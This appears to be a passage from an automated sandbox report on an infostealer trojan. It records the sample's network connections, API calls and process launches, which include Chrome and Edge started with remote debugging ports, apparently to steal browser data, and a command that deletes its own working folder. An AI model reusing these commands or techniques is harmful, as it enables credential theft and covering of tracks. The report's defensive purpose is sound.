                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.tiktok.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.youtube.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://y.music.163.com/m/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                  Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.6:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49796 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49841 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49960 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50022 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50061 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50103 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50154 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00407060 FindFirstFileA,strlen,FindFirstFileA,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060

                  System Summary

                  barindex
                  PE file has a writeable .text section
                  Source: ktyihkdfesf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004054A00_2_004054A0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041C4500_2_0041C450
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041B0B00_2_0041B0B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041A3400_2_0041A340
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041DD600_2_0041DD60
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041CF700_2_0041CF70
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0041D3F00_2_0041D3F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: String function: 00410340 appears 127 times
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: String function: 00404DF0 appears 77 times
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: String function: 004119B0 appears 43 times
                  Source: ktyihkdfesf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@72/277@22/19
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00412050 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,OpenProcess,TerminateProcess,CloseHandle,0_2_00412050
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1462OIB4.htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8744:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\01e7cc52-312d-41c1-a817-87be6e3048ce.tmpJump to behavior
                  Source: ktyihkdfesf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: ktyihkdfesf.exe, 00000000.00000003.2418278650.00000000035E5000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, F3WB1NY58.0.dr, LFKFUKFUS.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ktyihkdfesf.exeVirustotal: Detection: 45%
                  Source: ktyihkdfesf.exeReversingLabs: Detection: 55%
                  Source: unknownProcess created: C:\Users\user\Desktop\ktyihkdfesf.exe "C:\Users\user\Desktop\ktyihkdfesf.exe"
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2348,i,3398562599031357926,1603104178569398074,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2228,i,2139828529892091342,11985651726309101408,262144 /prefetch:3
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2996 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6600 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6744 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6792 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exitJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2348,i,3398562599031357926,1603104178569398074,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2228,i,2139828529892091342,11985651726309101408,262144 /prefetch:3Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2996 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6600 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6744 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
